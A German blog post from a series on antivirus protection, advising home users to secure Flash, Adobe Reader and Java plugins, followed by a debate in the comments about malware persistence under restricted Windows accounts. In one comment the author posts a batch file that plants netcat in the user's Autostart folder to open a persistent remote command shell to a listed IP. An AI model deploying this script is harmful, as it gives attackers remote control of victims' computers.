Startseite > Abhandlungen, Anleitungen, Datenschutz, Internet, Microsoft, Piraten, Sonstiges, Statische Tags, Technik > Serie Virenschutz: Exploit-Malware – Plugins schützen!

Serie Virenschutz: Exploit-Malware – Plugins schützen!

Dieser Artikel ist Teil einer Serie über Virenschutz. Hier gehts zum Anfang der Serie mit einer Einleitung und einer Liste der enthaltenen Artikel.

Im letzten Teil habe ich erklärt, wie Exploit-Malware funktioniert und was man wie und warum schützen muss. Hier gehe ich im Detail darauf ein, welche Maßnahmen sinnvoll sind, um die besonders fehleranfälligen und gefährdeten Browser-Plugins zu schützen.

Die zwei wichtigsten Plugins, die in der Vergangenheit für die meisten Sicherheitslücken verantwortlich sind, sind Adobe Flash und der Adobe Reader. Ersteres wird hauptsächlich für Youtube-Videos, Flashgames, schlecht programmierte Webseiten und nervige Werbung eingesetzt. Ohne Flash sind viele Seiten leider nicht vollständig nutzbar, ein Verzicht kommt also kaum in Frage. Der Adobe Reader dient zur Anzeige von PDF-Dateien. Auch darauf kann man kaum verzichten. Diese beiden Programme müssen aber auch jeden Fall topaktuell gehalten werden! Wie man das am Besten macht, erklärt der separate Artikel „Updaten – aber sicher“ aus dieser Serie.

Leider gibt es gerade bei diesen beiden Programmen immer wieder Lücken, die erst geschlossen werden, wenn sie überall missbraucht werden. Daher sollte man die Angriffsfläche reduzieren, indem man möglichst wenig Zugriff auf diese Plugins erlaubt.

Mithilfe eines Firefox-Addons namens NoScript kann man bei richtiger Einstellung (auch ohne JavaScript zu blockieren!) verhindern, dass unbekannte Seiten ohne ausdrückliche Freigabe PDF-Dateien oder Flash-Animationen anzeigen (Registerkarte „Eingebettete Objekte“ in den Einstellungen). Das hat den Vorteil, dass wenigstens unsichtbar eingebundene Malware außer Gefecht gesetzt wird. Außerdem verschwindet die blinkende und den Computer bremsende Werbung auf vielen Seiten. Das bereits im letzten Artikel genannte „AdBlock Plus“ bietet zusätzlichen Schutz.

Im Adobe Reader kann man darüberhinaus JavaScript deaktivieren. Während man viele Webseiten nicht mehr vollständig nutzen kann, wenn man JavaScript im Browser deaktiviert, bleibt eine Deaktivierung von JavaScript im Reader ohne große Folgen. Viele Sicherheitslücken befinden sich aber gerade im JavaScript-Teil, und viele Exploits nutzen JavaScript, um zu funktionieren, selbst wenn es theoretisch auch ohne ginge. JavaScript zu deaktivieren ist also auf jeden Fall eine gute Wahl. Dies kann man tun, indem man Adobe Reader startet, im Menü „Bearbeiten“ den Punkt „Voreinstellungen“ wählt, dort die Kategorie „JavaScript“ auswählt und oben das Häkchen bei „Acrobat JavaScript aktivieren“ entfernt. Nach Update sollte man prüfen, ob das Häkchen nicht zurückgekommen ist. Sollte ein Dokument ausnahmsweise doch JavaScript brauchen (wie z. B. bestimmte interaktive Formulare), bekommt man eine gelbe Warnleiste und kann für dieses eine Dokument JavaScript freigeben, wenn es aus einer vertrauenswürdigen Quelle stammt.

Media-Player-Software wie Quicktime, RealPlayer, VLC und DivX installiert oft ebenfalls Plugins. Diese werden gemeinsam mit der Software aktualisiert. Auch die müssen immer aktuell sein! Wenn man nicht weiß, wie man ein bestimmtes Programm aktualisieren kann – meist findet sich im „Hilfe“-Menü des Hauptfensters eine Updatefunktion, was auch der sicherste Weg für Updates sein dürfte.

Java ist inzwischen im Web kaum noch verbreitet, außer für exotische Spiele und Physik-Vorführapplets – dennoch ist es auf vielen Rechnern noch installiert. Die einfachste Lösung ist hier, Java im Browser einfach abzustellen, wenn man es nicht braucht: Im Menü „Extras“ auf „Add-Ons“, oben „Plugins“ wählen, alles wo „Java“ steht deaktivieren. Ansonsten muss man auch Java aktuell halten, am Besten über Systemsteuerung – Java – Aktualisierungen.

Wichtig bei den Plugin-Updates ist es, nicht auf gefälschte Updates hereinzufallen. Dieses Thema behandelt ein eigener Artikel: „Updaten – aber sicher!

  1. 2010-02-24 um 11:13 UTC

    Nichts für Ungut, aber angenommen, ein Windows- System, welches auf den aktuellen Patchlevel gehalten wird und mit eingeschränkten Benutzerechten für den Produktivbetrieb verwendet wird, sollte doch meines Wissens keine Möglichkeit für Malware bieten, sich einnisten zu können?
    „Ersteres wird für Youtube-Videos, Flashgames, schlecht programmierte Webseiten und nervige Werbung eingesetzt.“ Soll das bedeuten, dass Internetpräsenzen auf Flashbasis, schlecht programmiert seien?

    • Jan
      2010-02-25 um 02:50 UTC

      Selbst in einem auf den aktuellen Stand gepatchten System kann es Sicherheitslücken geben. Gerade Adobe bringt Patches nicht immer rechtzeitig raus. Mit eingeschränkten Benutzerrechten kann die Malware sich zwar noch nicht überall installieren, aber doch schon mit den Rechten des Nutzers wüten. Da kann sie sich zwar nicht „ordnungsgemäß“ ins Windows-Verzeichnis kopieren, das dürfte ihr aber egal sein. Eine gefakete Firefox-Extension o.ä. (im Homedirectory!) tuts ja auch, falls der Autostart schreibgeschützt sein sollte (hab kein Vista zum Testen griffbereit). Die EXE bzw. DLL kann ja problemlos ins Temp-Verzeichnis des Users abgeladen werden.

      Und ja, ich bin der Meinung, dass Webseiten, die Flash für das Menü (oder gar die ganze Website) einsetzen, zumindest in der Regel schlecht programmiert sind. Ohne Flash kann man das nicht nutzen, oft frisst es episch viel CPU, und ich will nicht einen schlechten Browser in einem Plugin in meinem echten Browser emuliert bekommen. Gerade für sehbehinderte Nutzer (die größere Schriften oder gar Screenreader brauchen) ist eine Flashseite unbrauchbar. Ich will in Menüs die mittlere Maustaste (Tabs öffnen) nutzen können, Linkziele sehen um Links hin- und herziehen zu können, die Seite in mein Fenster fließend eingepasst bekommen und zoomen können, Texte markieren können, die für mein System eingestellte Schriftglättung nutzen etc., und dafür kann ich gut auf aufwändige, meine Zeit kostende Animationen und Ladezeiten verzichten.

  2. 2010-02-25 um 08:33 UTC

    Deine Argumentation wirkt schlüssig und ich erahne bereits jetzt, dass du nicht vom Gegenteil zu überzeugen bist. Das will ich auch gar nicht, jedoch ist nicht nur das „eine“ abgrundtief schlecht und das „andere“ himmelhochjauchzend gut, zumindest diesen Kompromiss solltest du für dich selbst verinnerlichen. Ich bin kein Entwickler, aber IT-Admin und habe jahrelange Erfahrung mit Server/Client Security. Natürlich kann eine Schadsoftware, sofern sie im Rechtebereich des angemeldeten Users „gestartet“ wird, auch gewisses Schadpotential entfalten. Beschäftigt man sich jedoch intensiv mit Malware und deren Verbreitungswege, wird man letztendlich feststellen, dass aus ökonomischer Sicht von Malware- Entwicklern quasi kein Ansporn darin besteht, Malware für diesen uneffektiven Zweck zu entwickeln. Malware soll möglichst fest und dauerhaft im System verankert bleiben, um daraus Nutzen ziehen zu können. Daher gibt es, abgesehen von laboratorischen Ansätzen „in the wild“ keine Malware, die auf dieser Strategie basiert. Das ist nicht erfolgversprechend. Aber du kannst mir gerne eine Malware nennen, die nach dem Prinzip arbeitet, ein eingeschränktes Benutzerkonto zu unterlaufen und gleichzeitig die gewünschte Effektivität zu erreichen…
    Dein Beispiel ist theoretisch möglich, jedoch real nicht nachgewiesen. Aus Sicht des Malware- Entwicklers benötigt man für eine solche Angriffsvariante zuviele userseitige Ungeschicke, um es vornehm ausdrücken zu wollen. In einem sauber konfigurierten System (auch Windows) hat eine solche Malware, die im beschreibbaren Bereich des eingeschränkten Benutzers wüten möchte, keine lange Überlebensdauer, was deren Entwicklung allein schon unwirtschaftlich macht. Das Leben einer solchen Malware wäre spätestens nach einem Reboot ausgehaucht und müsste durch den User erneut gestartet werden. Das erfüllt in keiner Weise die Erwartungen eines Malware- Autoren. Ich wurde schon mehrfach mit diesen Argumenten konfrontiert, die auf experimentellen Laborversuchen basieren, doch noch nie konnte mir jemand einen faktischen Nachweis aus der Praxis liefern, denn man nachvollziehen konnte. Genau dies würde ich ja mal gerne tun…
    Diese Argumentationslinie ist eine rein hypothetische und praxisfremde. Die ungepatchten Lücken in Anwendungen wie Flashplayer, Acrobat Reader u.ä. werden von einem entsprechend restriktiv eingestellten Rechtesystem durchaus ausgeglichen. Dies läßt sich übrigens sehr gut durch Tests mit Malware nachvollziehen…

    Zum Thema Flash: Ja, die nervigen Werbefenster finde ich auch doof und vor allem überflüssig. Das Argument der Barrierefreiheit (weil Flash dies nicht könnte) zieht nicht, da dies möglich wäre. Wenn es jedoch nicht angewendet wird, ist das kein Verschulden der Entwicklungsumgebung. Ich möchte jetzt nicht all deine Kritikpunkte entkräften, dazu wende dich doch einfach an Adobe, um klare Fakten zu erhalten, damit keine Polemik entsteht, wenn man hier aus dem Bauch raus diskutiert. Was allerdings Unsinn ist, ist deine Behauptung mit der höheren CPU- Belastung durch Flash. Ich habe gelegentlich gerade aus diesem Grund auf Flash zurückgegriffen, weil bei Online- Anwendungen wie Diashows dadurch sich der Ressourcenverbrauch deutlich reduzieren läßt. Recht gebe ich dir darin, dass es leider viele „Baukästen“ gibt, die es Anwendern erlauben, ihre private Homepage damit optisch aufwerten zu können. Das wirre Kombinieren von Flash, Javascript, HTML und PHP (u.v.m.) erzeugt genau die Effekte, die nicht allein dir widerstreben. Im Übrigen werden deine Anforderungen, die du an eine Internetpräsenz stellst, ebenso wenig von konventionellen Websites unterstützt. Derzeit sind es Ausnahmen, auch bei reinen HTML- Seiten, die all deine Anforderungen unterstützen, was nichts mit der Entwicklungsumgebung an sich zu tun hat. Nur weil es möglich wäre, heißt das nicht, dass es auch umgesetzt wird.
    Mitunter die schlimmsten (angeblich) professionellen Internetpräsenzen findet man bei TV- Sendern (RTL, SAT1, Pro7 u.s.w.), die keineswegs Flash als Basis verwenden. Das Problem besteht in der Kombination (siehe Sourcecode) und der Tatsache, dass sie möglicht viel „Content“ gleichzeitig auf eine Seite packen. Ich finde es etwas vorverurteilend, deswegen allein Flash die Schuld anzulasten…

    In diesem Sinne,
    Forenwanderer

    • Jan
      2010-02-25 um 15:09 UTC

      Was die in-the-wild-Malware betrifft, kann ich dazu nichts sagen und habe weder Zeit noch Lust, das ordentlich zu testen. Ich behaupte aber mal, dass spätestens sobald dank Windows Vista/7 genug Leute mit eingeschränkten Accounts arbeiten, Malware für eingeschränkte Nutzer sich lohnt und programmiert wird. Wenn du die Zeit hast, setz doch mal eine Kiste auf, patche sie komplett, und spiele dann DAU und geh auf ein paar dubiose Seiten. (Natürlich alles Anklicken und Runterladen was bei 3 nicht auf den Bäumen ist, damit du genug „Testobjekte“ bekommst.) Wenn die Kiste nach einem Reboot sauber wäre, wäre ich sehr überrascht.

      Die Behauptung, dass bei einem eingeschränkten Benutzerkonto die Malware nach dem Neustart manuell gestartet werden muss, ist zumindest unter einem etwas älteren Windows XP falsch. Nimm die folgende Batchdatei (nur für ein deutsches XP gemacht):


      @echo off
      copy nc.exe "c:%homepath%\"
      echo cd "c:%homepath%\" > "c:%homepath%\Startm~1\Programme\Autostart\startmalware.bat"
      echo nc -e c:\WINDOWS\system32\cmd.exe 192.168.1.10 1337 -n >> "c:%homepath%\Startm~1\Programme\Autostart\startmalware.bat"
      echo pause >> "c:%homepath%\Startm~1\Programme\Autostart\startmalware.bat"

      (ich hoffe, wordpress hats nicht zerlegt, falls doch: pastebin)

      Füge ein Netcat for Windows hinzu, und du hast einen Installer für eine im Autostart liegende connectshell. Statt netcat mit ner Batchdatei kann man da natürlich auch eigene Software anbringen, damit kein sichtbares Fenster entsteht und damit das Teil etwas mehr macht. Installieren kann man sowas neben der obligatorischen „FREE Codec.exe“ natürlich auch über einen Exploit, der mit Benutzerrechten läuft, der Nutzer muss also nicht überdurchschnittlich blöde sein.

      Man kann einen Rechner in einer Firmenumgebung so konfigurieren, dass das nicht so einfach ist – das geht aber über diese für Otto Privatnutzer gedachte Anleitung weit hinaus. Ich bezweifle, dass das gezeigte Verhalten in irgendeiner neueren Version von Windows besser sein wird. Das Beispiel mit dem falschen Firefox-Plugin erfordert auf jeden Fall auch nur Nutzerrechte (Schreibzugriff auf Profilverzeichnis) und „wird gestartet sobald der Browser läuft“ würde mir reichen, wenn ich Malwareautor wäre…

      Was Flash betrifft: Ja, man kann mit Flash auch brauchbare Sachen produzieren, keine Frage. Aber ich habe sowas eben selten „in the wild“ ;-) gesehen. Die Liste oben ist nicht abschließend gemeint und ist als kleiner Seitenhieb zu verstehen. Ich füge mal ein „hauptsächlich“ ein, damit klar ist, dass es Ausnahmen gibt, das hätte schon am Anfang rein gehört. Für einen Link auf eine gut gemachte Flash-Seite wäre ich aus persönlichem Interesse sehr dankbar.

      • Anonymous
        2012-05-12 um 00:56 UTC

        Kleines Problem: Wo finde ich „dubiose Seiten“?
        Die Frage ist ernst gemeint – mir ist eine solche „in natura“ noch nie begegnet.

        • Jan
          2012-05-23 um 09:51 UTC

          Such mal nach Cracks, Keygens oder Raubkopien. Da solltest du einige Seiten finden, die dir in der Werbung „Sicherheitssoftware“ anbieten (Scareware). Ich glaub sogar die von kino.to verlinkten Filmhoster hatten damals jede Menge gefälschter Flashupdates/Codecs etc.

  3. 2010-02-25 um 19:59 UTC

    Deine kleine Batch ist sehr interessant, zeigt auf jeden Fall, dass in einer Nutzerumgebung durchaus Schaden angerichtet werden kann. NETCAT ist jedoch in Windows nicht standardmäßig implementiert und muss mit Adminrechten zunächst ins Systemverzeichnis kopiert werden. Die Ausführung des Batchfiles funktioniert manuell und auch im Autostart wird die Datei „startmalware.bat“ namentlich eingefügt. Nach einem Reboot erscheint schließlich eine Fehlermeldung, weil NC.EXE nicht existiert. Ein Virenscanner würde allerdings bei NC.EXE anschlagen und bereits vorher eingreifen. Du hast natürlich vollkommen recht, dass der Malware- Autor in seinen Trojaner eine eigene Routine einbinden würde, die einen Autostart- Eintrag erstellen könnte. Das ist aber bei Verwendung eines Virenscanners kein erfolgversprechendes Vorgehen, weil eben der Autostart und Veränderungen darin überwacht werden. Die Verwendung des RUN oder RUNONCE- Keys in der Registry fällt für dieses Vorhaben aus, weil hierfür wieder höhere Nutzerrechte erforderlich wären. Irrsinnigerweise habe ich es allerdings in einem Testsystem mit Adminrechten trotz diverser, hoch angepriesener Schutzsoftware geschafft, Malware so in der Registry zu manifestieren. Das ist auch zum üblichen Vorgehen bei Malware- Autoren geworden…
    „Wenn du die Zeit hast, setz doch mal eine Kiste auf, patche sie komplett, und spiele dann DAU und geh auf ein paar dubiose Seiten. (Natürlich alles Anklicken und Runterladen was bei 3 nicht auf den Bäumen ist, damit du genug “Testobjekte” bekommst.) Wenn die Kiste nach einem Reboot sauber wäre, wäre ich sehr überrascht.“

    Genau solche Tests habe ich schon mehrfach durchgeführt. Es ist tatsächlich so, dass sich Malware nie bei Verwendung von eingeschränkten Rechten einnisten konnte. Jede der Schadroutinen, ob ActiveX- Javascript- oder Exploit- basierend haben versucht, sich irgendwie in der Systemumgebung festzusetzen. Dies wurde dann mit auffälligen Fehlermeldungen quittiert und dann muss man wirklich schon blöde sein, dafür sein System auf Adminsteuerung umzustellen. Bei der Verwendung von Sicherheitssoftware und Adminrechten erhöht sich das Risiko einer Infektion um ein Vielfaches. Ob Symantec, Kaspersky, Zonelabs, G-Data- Produkte, eine zumindest Teilinfizierung konnte nachgewiesen werden. Diese Tests haben mir bestätigt, dass zumindest auf einem Windows- System die Verwendung eines eingeschränkten Benutzerkontos in Verbindung mit einen möglichst aktuellen Patchlevel und einer profilaktischen simplen Virenklingel das erfolgreichste Schutzmodel erreicht werden kann. Unersetzlich ist natürlich ein misstrauiges Userverhalten gegenüber dem Online- Rotlicht- Milieu. Ich gebe zu, mein Sicherheitskonzept ist auch nicht 100% sicher (deine kleine Batch zeigt’s ja anschaulich), hat aber gegenüber den typischen käuflichen Lösungen, die auf System/Adminrechten aufbauen, deutliche Vorteile. Sicherheitssoftwares (typischerweise als Security- Suites bezeichnet) müssen mit System/Adminrechten arbeiten. Ein Exploit in einer solchen Software würde den Supergau bedeuten, weil dann die Malware über diesen Weg die benötigten Rechte erlangen könnte. Dagegen wäre ein Flash- Exploit quasi Kinderkram…
    Dein Ausblick auf neuere Betriebssysteme (Vista/7), die bereits Nutzerrechte erfreulicherweise standardmäßig nutzen, werden meiner Meinung nach nicht über diesen Weg angegriffen. Ich denke vielmehr, man wird sich auf Exploits von Third Party Software, insbesondere auf Sicherheitslösungen konzentrieren, da hier die höchste Wahrscheinlichkeit besteht, dass Malware das System übernehmen kann.

    Zu Flash: Hier sind bereits erste Eindrücke für barrierefreies Flash nachzulesen: http://www.dvbs-online.de/horus/2003-6-3181.htm – ich merke an, da ist noch die Rede vom FlashPlayer 6, aktuell ist momentan die Version 10. Es ist also erwiesenermaßen, wie ich es bereits erwähnte, ein konzeptionelles Problem und kein Flash- eigenes.
    Schön ist relativ, mir gefällt z.B. als Flash- Internetpräsenz sowas ganz gut: http://www.avatar-derfilm.de/
    Ist sicher nicht barrierefrei, aber würde man die Effekte (Sound & Movies) konventionell bereitstellen wollen, hätte man schon einigen Aufwand. Die Ladezeiten sind zugegebenermaßen lang, aber wären noch länger, würde man die Videosequenzen als Quicktime, RealPlayer oder MPG- Standard nachladen. Man muss es im Verhältnis betrachten und wofür die Webpräsenz sein soll. Einer Arztpraxis oder Rechtsanwaltskanzlei würde ich sowas weniger zutrauen und wäre überdimensioniert. Übrigens habe ich persönlich meine Webpräsenz als Startseite mit Flash realisiert (www.oberthal-online.de) und habe dabei sogar Sicherheitsaspekte im Hinterkopf gehabt. Während der Flashplayer immer wieder wegen Exploits ins Gerede kommt, gibt’s auch Sichtweisen, die sicherheitstechnisch Flash gegenüber HTML oder Javascript bevorzugen. Typisches Beispiel wäre ein Kontaktformular. Ganz schlecht ist, die Emailadresse im Klartext per HTML einzubinden, was leider sehr oft geschieht. Auch HTML- Kontaktformulare beheben nicht diesen Mißstand. Man muss schon auf PHP oder CGI zurückgreifen, um sowas relativ sicher gestalten zu können. Das hängt wiederum entscheidend vom Webspace- Anbieter ab. Ein Flash- Kontaktformular ist in dieser Hinsicht sicher. Jede Münze hat zwei Seiten…
    Störend für mich ist an Flash hauptsächlich, dass es kein freier Standard ist – Windows ist das aber auch nicht :-) und Millionen Anwender scheinen sich daran nicht zu stören.

    Gruß,
    Forenwanderer (auch Pirat)

    • Jan
      2010-02-26 um 06:33 UTC

      Netcat muss nicht im Systemverzeichnis liegen, das Verzeichnis wo die Batchdatei am Anfang ausgeführt wird sollte reichen. Bist du sicher, dass man mit Userrechten nicht den Registry-Autostart nutzen kann? AFAIK gibts da auch beim Autostart einen System- und einen User-Bereich. Wenn die Malware tatsächlich so dämlich ist, das nicht zu nutzen, liegt es wohl daran, dass der Durchschnittsnutzer noch dämlicher ist ;-)

      Deine Meinung, dass Antivirensoftware wenig taugt, teile ich. Die zwei letzten Teile der Serie werden dir wohl gefallen.

      Die Avatar-Flashsite ist wohl Geschmackssache (ich finde das Teil von der Usability her schrecklich). Von den ganzen Flashsites ist es aber tatsächlich noch eine halbwegs erträgliche, die meisten anderen sind noch viel viel schlimmer. Am Meisten hasse ich ja Flash-Menüs und -buttons, weil man keine Kontrolle mehr darüber hat, wie sich die Links öffnen.

  4. 2010-02-26 um 08:27 UTC

    Ja, etwas dumm ausgedrückt meinerseits: „Netcat muss nicht im Systemverzeichnis liegen“ – soll heißen, das (System)tool muss zunächst manuell ebenfalls ins System gebracht werden, egal in welches Verzeichnis. Dort wäre jedoch sicher gestellt, dass eine Ausführung ohne genau definierte Umgebungsvariablen funktioniert.
    „AFAIK gibts da auch beim Autostart einen System- und einen User-Bereich.“ Du hast recht – HKEY_CURRENT_USER – heißt dieser Bereich und ich bin erschrocken, dass ich genau diesen Bereich ohne höhere Rechte manipulieren kann bei Windows XP. Vista hat da wenigstens die UAC vorgeschaltet, wobei diese gerne vom User abgeschaltet wird, weil sie ja zu sehr nervt. Das %USERPROFILE% steht somit einer Malware zur freien Verfügung.
    „Wenn die Malware tatsächlich so dämlich ist…“ – das überrascht mich doch sehr, dass Malware sich zur Zeit so spezifisch auf System und Systen32 beschränkt. Ich möchte jetzt nicht noch einmal mit einem Testsystem die Schmuddelecken des Internet aufsuchen, vielleicht war ich auch einfach nicht am richtigen Ort. Alle angreifenden Exploits und ActiveX- sowie Javascript- Wundertüten wurden an ihrer Installation gehindert. Im Userprofile würden mir durchaus interessante Möglichkeiten einfallen, offensichtlich haben es Malwareautoren derzeit tatsächlich nicht nötig, sich zu spezifizieren. Der Durchschnittsuser ist dämlicher als er es selbst für möglich hält. Viele, die denken, Durchschnittsuser zu sein, sind tatsächlich DAU’s. OK, der Punkt geht klar an dich – mich würde nun brennend interessieren, weshalb Malware so wenig sich auf das %Userprofile% konzentriert? Jetzt hätte ich doch gern mal eine Malware, die sich auch hierauf konzentriert bzw. einen richtig bösen Link!!! Da muss es doch einfach etwas geben!

    Antivirensoftware betrachte ich rein als Testware. An einigen Ecken bekommt man u.U. einen Warnhinweis, aber echten Schutz lassen durchweg alle Produkte vermissen. Aus o.g. Aspekten müsste ich mein Sicherheitskonzept noch etwas erweitern und das (eingeschränkte) Benutzerkonto darüber hinaus noch als Wegwerfaccount verwenden, den ich nach jedem Onlinegang lösche und neu anlege. Deine Prognose für die Zukunft würde darauf hinaus laufen, dass Malware sich auf %Userprofile% konzentriert, wenn von Seiten der neuen Betriebssysteme darauf nicht massiv reagiert wird. Alternativ bietet sich die Verwendung von Live- CD’s oder virtuellen Maschinen für den sicheren Onlinegang an. Eigentlich ist XP aus Sicherheitsaspekten ungeeignet, um damit online zu gehen, da helfen auch keine Security Suites, die allumfassende Sicherheit versprechen und das System auf ihre Weise lahm legen. Meine Antipathie gegen solche Schutzsoftware entspringt der Tatsache, dass durch False Positives meine selbst erstellten Loginscripts und Tools an ihrer Arbeit gehindert werden. Der Nutzen dieser Softwares steht in keinem Verhältnis zur Arbeitsbeeinträchtigung, besonders wenn man systemnah arbeiten muss.

    Zu Flash: Du wirst sicher kein Fan davon werden – macht ja nix. Jetzt solltest du mir aber auch mal Beispiele nennen, wo Homepages deinen Ansprüchen genügen…
    „…weil man keine Kontrolle mehr darüber hat, wie sich die Links öffnen.“ Das verstehe ich nicht so wirklich? Was willst du denn kontrollieren und wie?

    Gruß,
    Forenwanderer

    • Jan
      2010-02-26 um 13:55 UTC

      Ehrlich gesagt überrascht mich sogar, dass bei HKCU die UAC greift. Mit einem aktuell gepatchten System gibt es derzeit (also bis Adobe die nächste bekannte Sicherheitslücke 2 Monate lang offen lässt) AFAIK außer Dummheit (alles Downloaden was nicht schnell genug wegläuft) keinen Weg, sich Mainstream-Malware einzufangen. (Spezialanfertigungen aus China für Firmen dürften noch irgendwelche unbekannten Wege finden.) Mit nem guten Beispiel wo Dummheit nicht nötig ist kann ich also leider nicht dienen.

      Was ich vor Kurzem „in the wild“ gesehen hab war ein Werbelink auf http://www(punkt)schnellfirefox10(punkt)com wenn man bei Google nach Firefox gesucht hat. Die Malware kündigt ordnungsgemäß an, dass sie sich installiert (was DAUs leider tatsächlich nicht stört!), aber ich glaub der könnte ein eingeschränkter Account reichen. Leider liefert die Seite ab und zu auch den echten Firefox (vielleicht inzwischen sogar immer, die Übersetzung haben sie auch gefixt).

      Wenn du einen DAU simulieren willst, lade dir doch auf einschlägigen Seiten ein paar Keygens für irgendwas runter (sollte sogar legal sein, wenn du die Seriennummern nicht nutzt). Je nach Seite sollten mindestens 50% davon verseucht sein. Dann schau, welche davon UAC triggern und welche nicht.

      Gegen Browser-Exploits würde ein „sehr eingeschränkter Account“ extra für den Browser bzw. sowas wie AppArmor/SELinux helfen. Der Browser hat vollen Zugriff auf seine Verzeichnisse, das Downloads-Verzeichnis, und darüber hinaus Lesezugriff nur auf die Libraries etc. die er braucht. Gegen Nutzer, die nicht wissen, dass ihre Pornodownloads möglichst nich mit .exe enden sollten, hilft das aber leider wenig.

      Die Sache mit den False Positives ist Thema des Samstag-Artikels.

      „Kontrolle wie sich die Links öffnen“ heißt 1. dass ich gerne sehe wohin der Link geht (Symbolleiste) und vor allem 2. dass ich den Link gerne mit der mittleren Maustaste (neuer Tab), der rechten Maustaste (Kontextmenü mit Möglichkeit ihn zu kopieren, in einem neuen Fenster öffnen etc.), einer „Darüberzieh“-Mausgeste etc. öffnen können will.

      Meinen Ansprüchen genügen die meisten normalen HTML-Webseiten, die JavaScript und Flash nur da einsetzen, wo es sinnvoll ist (bei Flash: Audio/Video derzeit leider noch, bis HTML5 genug Verbreitung hat).

  1. 2010-02-25 um 05:01 UTC
  2. 2010-02-27 um 05:22 UTC
  3. 2010-02-27 um 05:27 UTC

Schreibe einen Kommentar

Trage deine Daten unten ein oder klicke ein Icon um dich einzuloggen:

WordPress.com-Logo

Du kommentierst mit Deinem WordPress.com-Konto. Abmelden / Ändern )

Twitter-Bild

Du kommentierst mit Deinem Twitter-Konto. Abmelden / Ändern )

Facebook-Foto

Du kommentierst mit Deinem Facebook-Konto. Abmelden / Ändern )

Google+ Foto

Du kommentierst mit Deinem Google+-Konto. Abmelden / Ändern )

Verbinde mit %s

%d Bloggern gefällt das: